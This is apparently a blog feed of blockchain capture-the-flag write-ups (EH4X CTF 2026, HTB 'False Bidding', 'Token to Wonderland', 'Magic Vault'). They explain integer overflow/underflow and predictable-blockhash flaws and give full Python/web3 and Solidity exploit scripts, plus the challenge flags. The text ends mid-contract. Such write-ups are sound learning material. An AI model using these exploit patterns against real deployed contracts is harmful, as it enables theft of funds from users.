/tags/blockchain/ Recent content in Blockchain on Zero's Blog Hugo en-us Wed, 04 Mar 2026 14:00:00 +0700 /posts/eh4x-ctf-2026-writeup/ Wed, 04 Mar 2026 14:00:00 +0700 /posts/eh4x-ctf-2026-writeup/ <h2 id="overview">Overview</h2> <p>This post collects the solved EH4X CTF 2026 challenges and the practical exploitation approach used for each.</p> <h2 id="table-of-contents">Table of Contents</h2> <ul> <li><a href="#heist-v1-blockchain">Heist V1 (Blockchain)</a></li> <li><a href="#i-guess-bro-reverse">i-guess-bro (Reverse)</a></li> <li><a href="#womp-womp-pwn">Womp Womp (Pwn)</a></li> <li><a href="#lulocator-pwn">Lulocator (Pwn)</a></li> <li><a href="#sarcasm--sarcasm-pwn">SarcAsm / Sarcasm (Pwn)</a></li> <li><a href="#inferno-sprint-misc">Inferno Sprint (Misc)</a></li> <li><a href="#chusembly-misc">Chusembly (Misc)</a></li> <li><a href="#final-notes">Final Notes</a></li> </ul> <hr> <h2 id="heist-v1-blockchain">Heist V1 (Blockchain)</h2> <h3 id="tldr">TL;DR</h3> <p>The vault trusted governance too much. By setting governance to an attacker contract and abusing delegatecall execution, storage got overwritten (<code>admin</code>/<code>paused</code>), then funds could be withdrawn.</p> /posts/htb-blockchain-false-bidding/ Wed, 25 Feb 2026 01:43:00 +0700 /posts/htb-blockchain-false-bidding/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> False Bidding</li> <li><strong>Category:</strong> Blockchain</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal condition:</strong> <code>TARGET.keyOwner() == player</code></li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-causes">Root Causes</h2> <ol> <li><strong>Bid threshold overflow</strong> in receive gate: <ul> <li>condition uses <code>uint64(msg.value) &gt;= 2 * topBidder().bid</code></li> <li>set top bid to $2^{63}$ ⇒ <code>2 * bid</code> wraps to <code>0</code> (in uint64 space)</li> </ul> </li> <li><strong><code>uint32 timeout</code> wraparound</strong>: <ul> <li>every accepted bid does <code>timeout += YEAR</code></li> <li>repeated increments overflow timeout below current timestamp</li> </ul> </li> </ol> <h2 id="exploit-plan">Exploit Plan</h2> <ul> <li>Become top bidder with <code>2^63</code> wei.</li> <li>Alternate zero-value bids between two EOAs (must satisfy <code>msg.sender != topBidder().addr</code>).</li> <li>Keep extending timeout until it wraps to past time.</li> <li>Claim prize as top bidder.</li> </ul> <h2 id="full-poc-script-pythonweb3">Full PoC Script (Python/web3)</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> requests </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> web3 <span style="color:#f92672">import</span> Web3 </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> eth_utils <span style="color:#f92672">import</span> keccak </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> eth_abi <span style="color:#f92672">import</span> decode </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> eth_account <span style="color:#f92672">import</span> Account </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>BASE <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;http://&lt;INSTANCE_IP&gt;:&lt;PORT&gt;&#34;</span> </span></span><span style="display:flex;"><span>RPC <span style="color:#f92672">=</span> BASE <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/rpc&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>info <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(BASE <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/connection_info&#34;</span>, timeout<span style="color:#f92672">=</span><span style="color:#ae81ff">10</span>)<span style="color:#f92672">.</span>json() </span></span><span style="display:flex;"><span>PRIV <span style="color:#f92672">=</span> info[<span style="color:#e6db74">&#34;PrivateKey&#34;</span>] </span></span><span style="display:flex;"><span>PLAYER <span style="color:#f92672">=</span> Web3<span style="color:#f92672">.</span>to_checksum_address(info[<span style="color:#e6db74">&#34;Address&#34;</span>]) </span></span><span style="display:flex;"><span>TARGET <span style="color:#f92672">=</span> Web3<span style="color:#f92672">.</span>to_checksum_address(info[<span style="color:#e6db74">&#34;TargetAddress&#34;</span>]) </span></span><span style="display:flex;"><span>SETUP <span style="color:#f92672">=</span> Web3<span style="color:#f92672">.</span>to_checksum_address(info[<span style="color:#e6db74">&#34;setupAddress&#34;</span>]) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>w3 <span style="color:#f92672">=</span> Web3(Web3<span style="color:#f92672">.</span>HTTPProvider(RPC)) </span></span><span style="display:flex;"><span>acctA <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>account<span style="color:#f92672">.</span>from_key(PRIV) </span></span><span style="display:flex;"><span>acctB <span style="color:#f92672">=</span> Account<span style="color:#f92672">.</span>create(<span style="color:#e6db74">&#34;false-bidding&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>sel_timeout <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;timeout()&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span>sel_top <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;topBidder()&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span>sel_claim <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;claimPrize()&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span>sel_solved <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;isSolved(address)&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">call_u256</span>(to, sel): </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> int<span style="color:#f92672">.</span>from_bytes(w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>call({<span style="color:#e6db74">&#34;to&#34;</span>: to, <span style="color:#e6db74">&#34;data&#34;</span>: sel}), <span style="color:#e6db74">&#34;big&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">top_bidder</span>(): </span></span><span style="display:flex;"><span> r <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>call({<span style="color:#e6db74">&#34;to&#34;</span>: TARGET, <span style="color:#e6db74">&#34;data&#34;</span>: sel_top}) </span></span><span style="display:flex;"><span> addr, bid <span style="color:#f92672">=</span> decode([<span style="color:#e6db74">&#34;address&#34;</span>, <span style="color:#e6db74">&#34;uint64&#34;</span>], r) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> Web3<span style="color:#f92672">.</span>to_checksum_address(addr), int(bid) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">send</span>(acct, to, value<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>, data<span style="color:#f92672">=</span><span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;</span>, gas<span style="color:#f92672">=</span><span style="color:#ae81ff">220000</span>): </span></span><span style="display:flex;"><span> tx <span style="color:#f92672">=</span> { </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;chainId&#34;</span>: w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>chain_id, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;nonce&#34;</span>: w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>get_transaction_count(acct<span style="color:#f92672">.</span>address), </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;to&#34;</span>: to, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;value&#34;</span>: value, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;data&#34;</span>: data, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;gas&#34;</span>: gas, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;maxFeePerGas&#34;</span>: w3<span style="color:#f92672">.</span>to_wei(<span style="color:#ae81ff">2</span>, <span style="color:#e6db74">&#34;gwei&#34;</span>), </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;maxPriorityFeePerGas&#34;</span>: w3<span style="color:#f92672">.</span>to_wei(<span style="color:#ae81ff">1</span>, <span style="color:#e6db74">&#34;gwei&#34;</span>), </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> stx <span style="color:#f92672">=</span> acct<span style="color:#f92672">.</span>sign_transaction(tx) </span></span><span style="display:flex;"><span> h <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>send_raw_transaction(stx<span style="color:#f92672">.</span>raw_transaction) </span></span><span style="display:flex;"><span> r <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>wait_for_transaction_receipt(h) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> h<span style="color:#f92672">.</span>hex(), r<span style="color:#f92672">.</span>status </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># fund second EOA for gas</span> </span></span><span style="display:flex;"><span>print(send(acctA, acctB<span style="color:#f92672">.</span>address, value<span style="color:#f92672">=</span>w3<span style="color:#f92672">.</span>to_wei(<span style="color:#ae81ff">1</span>, <span style="color:#e6db74">&#34;ether&#34;</span>), gas<span style="color:#f92672">=</span><span style="color:#ae81ff">21000</span>)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># set top bid to 2^63</span> </span></span><span style="display:flex;"><span>print(send(acctA, TARGET, value<span style="color:#f92672">=</span>(<span style="color:#ae81ff">1</span> <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">63</span>))) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># overflow timeout with alternating 0-value bids</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">1</span>, <span style="color:#ae81ff">260</span>): </span></span><span style="display:flex;"><span> cur_top, _ <span style="color:#f92672">=</span> top_bidder() </span></span><span style="display:flex;"><span> nxt <span style="color:#f92672">=</span> acctB <span style="color:#66d9ef">if</span> cur_top<span style="color:#f92672">.</span>lower() <span style="color:#f92672">==</span> PLAYER<span style="color:#f92672">.</span>lower() <span style="color:#66d9ef">else</span> acctA </span></span><span style="display:flex;"><span> txh, st <span style="color:#f92672">=</span> send(nxt, TARGET, value<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>, gas<span style="color:#f92672">=</span><span style="color:#ae81ff">120000</span>) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> st <span style="color:#f92672">!=</span> <span style="color:#ae81ff">1</span>: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">raise</span> <span style="color:#a6e22e">RuntimeError</span>(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;zero-bid failed at step </span><span style="color:#e6db74">{</span>i<span style="color:#e6db74">}</span><span style="color:#e6db74">: </span><span style="color:#e6db74">{</span>txh<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> tmo <span style="color:#f92672">=</span> call_u256(TARGET, sel_timeout) </span></span><span style="display:flex;"><span> now <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>get_block(<span style="color:#e6db74">&#34;latest&#34;</span>)<span style="color:#f92672">.</span>timestamp </span></span><span style="display:flex;"><span> top, bid <span style="color:#f92672">=</span> top_bidder() </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> tmo <span style="color:#f92672">&lt;</span> now <span style="color:#f92672">and</span> top<span style="color:#f92672">.</span>lower() <span style="color:#f92672">==</span> PLAYER<span style="color:#f92672">.</span>lower(): </span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">&#34;ready&#34;</span>, i, <span style="color:#e6db74">&#34;timeout&#34;</span>, tmo, <span style="color:#e6db74">&#34;now&#34;</span>, now, <span style="color:#e6db74">&#34;top&#34;</span>, top, <span style="color:#e6db74">&#34;bid&#34;</span>, bid) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">break</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># claim</span> </span></span><span style="display:flex;"><span>print(send(acctA, TARGET, data<span style="color:#f92672">=</span>sel_claim, gas<span style="color:#f92672">=</span><span style="color:#ae81ff">150000</span>)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>solved_raw <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>call({ </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;to&#34;</span>: SETUP, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;data&#34;</span>: sel_solved <span style="color:#f92672">+</span> bytes<span style="color:#f92672">.</span>fromhex(PLAYER[<span style="color:#ae81ff">2</span>:]<span style="color:#f92672">.</span>rjust(<span style="color:#ae81ff">64</span>, <span style="color:#e6db74">&#34;0&#34;</span>)) </span></span><span style="display:flex;"><span>}) </span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">&#34;isSolved:&#34;</span>, int<span style="color:#f92672">.</span>from_bytes(solved_raw, <span style="color:#e6db74">&#34;big&#34;</span>) <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">&#34;flag:&#34;</span>, requests<span style="color:#f92672">.</span>get(BASE <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/flag&#34;</span>, timeout<span style="color:#f92672">=</span><span style="color:#ae81ff">10</span>)<span style="color:#f92672">.</span>text) </span></span></code></pre></div><h2 id="flag">Flag</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>HTB{0v32f10w_70_w1n_7h3_4uc710n} </span></span></code></pre></div></pagevault> /posts/htb-blockchain-token-to-wonderland/ Wed, 25 Feb 2026 01:42:00 +0700 /posts/htb-blockchain-token-to-wonderland/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Token to Wonderland</li> <li><strong>Category:</strong> Blockchain</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal condition:</strong> become owner of item index <code>2</code> (<code>Golden Key</code>)</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The token contract uses Solidity 0.7 unchecked arithmetic and validates transfer with:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-solidity" data-lang="solidity"><span style="display:flex;"><span>require(fromBalance <span style="color:#f92672">-</span> amount <span style="color:#f92672">&gt;=</span> <span style="color:#ae81ff">0</span>, <span style="color:#e6db74">&#34;ERC20: transfer amount exceeds balance&#34;</span>); </span></span></code></pre></div><p>That condition is broken in 0.7: subtraction underflow wraps instead of reverting.</p> <h2 id="exploit-chain">Exploit Chain</h2> <ol> <li>Start with player balance = <code>100</code>.</li> <li>Transfer <code>101</code> → underflow balance to huge value.</li> <li>Approve Shop to spend large amount.</li> <li>Call <code>buyItem(2)</code> for <code>Golden Key</code>.</li> </ol> <h2 id="full-poc-script-pythonweb3">Full PoC Script (Python/web3)</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> requests </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> web3 <span style="color:#f92672">import</span> Web3 </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> eth_utils <span style="color:#f92672">import</span> keccak </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>BASE <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;http://&lt;INSTANCE_IP&gt;:&lt;PORT&gt;&#34;</span> </span></span><span style="display:flex;"><span>RPC <span style="color:#f92672">=</span> BASE <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/rpc&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>info <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(BASE <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/connection_info&#34;</span>, timeout<span style="color:#f92672">=</span><span style="color:#ae81ff">10</span>)<span style="color:#f92672">.</span>json() </span></span><span style="display:flex;"><span>priv <span style="color:#f92672">=</span> info[<span style="color:#e6db74">&#34;PrivateKey&#34;</span>] </span></span><span style="display:flex;"><span>player <span style="color:#f92672">=</span> Web3<span style="color:#f92672">.</span>to_checksum_address(info[<span style="color:#e6db74">&#34;Address&#34;</span>]) </span></span><span style="display:flex;"><span>shop <span style="color:#f92672">=</span> Web3<span style="color:#f92672">.</span>to_checksum_address(info[<span style="color:#e6db74">&#34;TargetAddress&#34;</span>]) </span></span><span style="display:flex;"><span>setup <span style="color:#f92672">=</span> Web3<span style="color:#f92672">.</span>to_checksum_address(info[<span style="color:#e6db74">&#34;setupAddress&#34;</span>]) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>w3 <span style="color:#f92672">=</span> Web3(Web3<span style="color:#f92672">.</span>HTTPProvider(RPC)) </span></span><span style="display:flex;"><span>acct <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>account<span style="color:#f92672">.</span>from_key(priv) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Shop storage slot 1 holds SilverCoin address</span> </span></span><span style="display:flex;"><span>slot1 <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>get_storage_at(shop, <span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span>silver <span style="color:#f92672">=</span> Web3<span style="color:#f92672">.</span>to_checksum_address(<span style="color:#e6db74">&#34;0x&#34;</span> <span style="color:#f92672">+</span> slot1<span style="color:#f92672">.</span>hex()[<span style="color:#f92672">-</span><span style="color:#ae81ff">40</span>:]) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>sig_transfer <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;transfer(address,uint256)&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span>sig_approve <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;approve(address,uint256)&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span>sig_buy <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;buyItem(uint256)&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span>sig_solved <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;isSolved(address)&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">pad32</span>(x: int) <span style="color:#f92672">-&gt;</span> bytes: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> x<span style="color:#f92672">.</span>to_bytes(<span style="color:#ae81ff">32</span>, <span style="color:#e6db74">&#34;big&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">pad_addr</span>(a: str) <span style="color:#f92672">-&gt;</span> bytes: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> bytes<span style="color:#f92672">.</span>fromhex(a[<span style="color:#ae81ff">2</span>:]<span style="color:#f92672">.</span>rjust(<span style="color:#ae81ff">64</span>, <span style="color:#e6db74">&#34;0&#34;</span>)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">send</span>(to, data, gas<span style="color:#f92672">=</span><span style="color:#ae81ff">180000</span>): </span></span><span style="display:flex;"><span> tx <span style="color:#f92672">=</span> { </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;chainId&#34;</span>: w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>chain_id, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;nonce&#34;</span>: w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>get_transaction_count(player), </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;to&#34;</span>: to, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;value&#34;</span>: <span style="color:#ae81ff">0</span>, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;gas&#34;</span>: gas, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;data&#34;</span>: data, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;maxFeePerGas&#34;</span>: w3<span style="color:#f92672">.</span>to_wei(<span style="color:#ae81ff">2</span>, <span style="color:#e6db74">&#34;gwei&#34;</span>), </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;maxPriorityFeePerGas&#34;</span>: w3<span style="color:#f92672">.</span>to_wei(<span style="color:#ae81ff">1</span>, <span style="color:#e6db74">&#34;gwei&#34;</span>), </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> stx <span style="color:#f92672">=</span> acct<span style="color:#f92672">.</span>sign_transaction(tx) </span></span><span style="display:flex;"><span> h <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>send_raw_transaction(stx<span style="color:#f92672">.</span>raw_transaction) </span></span><span style="display:flex;"><span> r <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>wait_for_transaction_receipt(h) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> h<span style="color:#f92672">.</span>hex(), r<span style="color:#f92672">.</span>status </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 1) Underflow</span> </span></span><span style="display:flex;"><span>print(send(silver, sig_transfer <span style="color:#f92672">+</span> pad_addr(shop) <span style="color:#f92672">+</span> pad32(<span style="color:#ae81ff">101</span>), gas<span style="color:#f92672">=</span><span style="color:#ae81ff">120000</span>)) </span></span><span style="display:flex;"><span><span style="color:#75715e"># 2) Approve</span> </span></span><span style="display:flex;"><span>print(send(silver, sig_approve <span style="color:#f92672">+</span> pad_addr(shop) <span style="color:#f92672">+</span> pad32(<span style="color:#ae81ff">30_000_000</span>), gas<span style="color:#f92672">=</span><span style="color:#ae81ff">120000</span>)) </span></span><span style="display:flex;"><span><span style="color:#75715e"># 3) Buy key</span> </span></span><span style="display:flex;"><span>print(send(shop, sig_buy <span style="color:#f92672">+</span> pad32(<span style="color:#ae81ff">2</span>), gas<span style="color:#f92672">=</span><span style="color:#ae81ff">180000</span>)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>solved_raw <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>call({<span style="color:#e6db74">&#34;to&#34;</span>: setup, <span style="color:#e6db74">&#34;data&#34;</span>: sig_solved <span style="color:#f92672">+</span> pad_addr(player)}) </span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">&#34;isSolved:&#34;</span>, int<span style="color:#f92672">.</span>from_bytes(solved_raw, <span style="color:#e6db74">&#34;big&#34;</span>) <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">&#34;flag:&#34;</span>, requests<span style="color:#f92672">.</span>get(BASE <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/flag&#34;</span>, timeout<span style="color:#f92672">=</span><span style="color:#ae81ff">10</span>)<span style="color:#f92672">.</span>text) </span></span></code></pre></div><h2 id="flag">Flag</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>HTB{und32f10w_70_937_7h3_k3y} </span></span></code></pre></div></pagevault> /posts/htb-blockchain-magic-vault/ Wed, 25 Feb 2026 01:41:00 +0700 /posts/htb-blockchain-magic-vault/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Magic Vault</li> <li><strong>Category:</strong> Blockchain</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal condition:</strong> make <code>TARGET.mapHolder() != address(TARGET)</code></li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p><code>unlock(bytes16)</code> depends on internal key material derived from <code>_magicPassword()</code>, where constructor-time <code>passphrase</code> derivation uses:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-solidity" data-lang="solidity"><span style="display:flex;"><span>keccak256(abi.encodePacked(<span style="color:#66d9ef">uint256</span>(blockhash(block.timestamp)))) </span></span></code></pre></div><p>In constructor context, that blockhash path is effectively deterministic for this challenge deployment pattern. Combined with strict but satisfiable bit-layout checks, the lock can be opened reliably.</p> <h2 id="exploit-contract-full-poc">Exploit Contract (Full PoC)</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-solidity" data-lang="solidity"><span style="display:flex;"><span><span style="color:#75715e">// SPDX-License-Identifier: UNLICENSED </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">pragma solidity</span> <span style="color:#f92672">^</span><span style="color:#ae81ff">0</span>.<span style="color:#ae81ff">8</span>.<span style="color:#ae81ff">13</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">interface</span> <span style="color:#a6e22e">IVault</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">nonce</span>() <span style="color:#66d9ef">external</span> <span style="color:#66d9ef">view</span> <span style="color:#66d9ef">returns</span> (<span style="color:#66d9ef">uint256</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">owner</span>() <span style="color:#66d9ef">external</span> <span style="color:#66d9ef">view</span> <span style="color:#66d9ef">returns</span> (<span style="color:#66d9ef">address</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">unlock</span>(<span style="color:#66d9ef">bytes16</span> _password) <span style="color:#66d9ef">external</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">claimContent</span>() <span style="color:#66d9ef">external</span>; </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">contract</span> <span style="color:#a6e22e">Exploit</span> { </span></span><span style="display:flex;"><span> IVault <span style="color:#66d9ef">public</span> target; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint256</span> <span style="color:#66d9ef">private</span> n; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">constructor</span>(<span style="color:#66d9ef">address</span> _target) { </span></span><span style="display:flex;"><span> target <span style="color:#f92672">=</span> IVault(_target); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">_generateKey</span>(<span style="color:#66d9ef">uint256</span> _reductor) <span style="color:#66d9ef">private</span> <span style="color:#66d9ef">returns</span> (<span style="color:#66d9ef">uint256</span> ret) { </span></span><span style="display:flex;"><span> ret <span style="color:#f92672">=</span> <span style="color:#66d9ef">uint256</span>(keccak256(abi.encodePacked(<span style="color:#66d9ef">uint256</span>(blockhash(block.number <span style="color:#f92672">-</span> _reductor)) <span style="color:#f92672">+</span> n))); </span></span><span style="display:flex;"><span> n<span style="color:#f92672">++</span>; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">_magicPassword</span>() <span style="color:#66d9ef">private</span> <span style="color:#66d9ef">returns</span> (<span style="color:#66d9ef">bytes8</span>) { </span></span><span style="display:flex;"><span> n <span style="color:#f92672">=</span> target.nonce(); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint256</span> key1 <span style="color:#f92672">=</span> _generateKey(block.timestamp <span style="color:#f92672">%</span> <span style="color:#ae81ff">2</span> <span style="color:#f92672">+</span> <span 